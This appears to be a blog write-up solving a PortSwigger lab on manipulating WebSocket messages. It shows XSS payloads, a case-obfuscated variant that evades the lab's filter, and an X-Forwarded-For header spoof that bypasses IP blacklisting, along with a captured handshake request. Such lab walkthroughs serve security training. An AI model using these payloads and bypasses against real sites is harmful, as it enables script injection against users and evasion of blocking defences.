Postswigger Lab Simple Solution — Manipulating the WebSocket to exploit vulnerabilities | Karthikeyan Nagaraj

Lab Description:

This online shop has a live chat feature implemented using WebSockets.

It has an aggressive but flawed XSS filter.

To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent's browser.

WebSockets are becoming increasingly popular because they greatly simplify the communication between a client and a server.

The WebSocket protocol uses the OSI model application layer (Layer 7) to allow a client and server to perform bidirectional (full duplex) communication. This makes it possible to create dynamic, real-time web applications such as instant messaging and photo-sharing apps.

WebSockets overcome some of the traditional restrictions of communications between browsers and servers:

• Client requests/server responds — n the past servers had permanent listeners. The client (the one using the browser) didn’t have a fixed listener for long-term connections. This made each communication centered around the client's demands and the server's response.
• Communication is dependent on the client — the server can only push a resource to a client when the client requests it.
• Continual checking — clients are constantly forced to refresh results from the server. This is why libraries focus on making all asynchronous calls optimized. They also have to identify their response. The most common solution to this problem is the use of callback functions.

Analysis:

1. First of all, let’s try the live chat Functionality and Intercept try to Intercept the traffic using Burpsuite

2. Send the Request you find on Websocket History to the Repeater

3. Let’s try to Inject any XSS Payload and try to Reconnect

<img src=1 onerror='alert(1)'>

Our Address is Blacklisted

4. So now, let’s add an Additional header to Stop Blacklisting.

Add the following header to the handshake request to spoof your IP address,

X-Forwarded-For: 1.1.1.1

GET /chat HTTP/1.1
Host: 0ac6003b03db7411c00dd1370074002f.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Sec-WebSocket-Version: 13
Origin: https://0ac6003b03db7411c00dd1370074002f.web-security-academy.net
Sec-WebSocket-Key: YeHso2ZIklfAwWtbrivsDA==
Connection: keep-alive, Upgrade
Cookie: session=pS6iHSLHKf0VWHuWJHhB9lCt523M5hvj
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
X-Forwarded-For: 1.1.1.1

5. Now Click Connect and send a WebSocket message containing an obfuscated XSS payload, such as:

<img src=1 oNeRrOr=alert`1`>

Feel Free to Ask Queries via LinkedIn and to Buy me a Cofee : )

Thank you for Reading!!

Happy Hunting ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng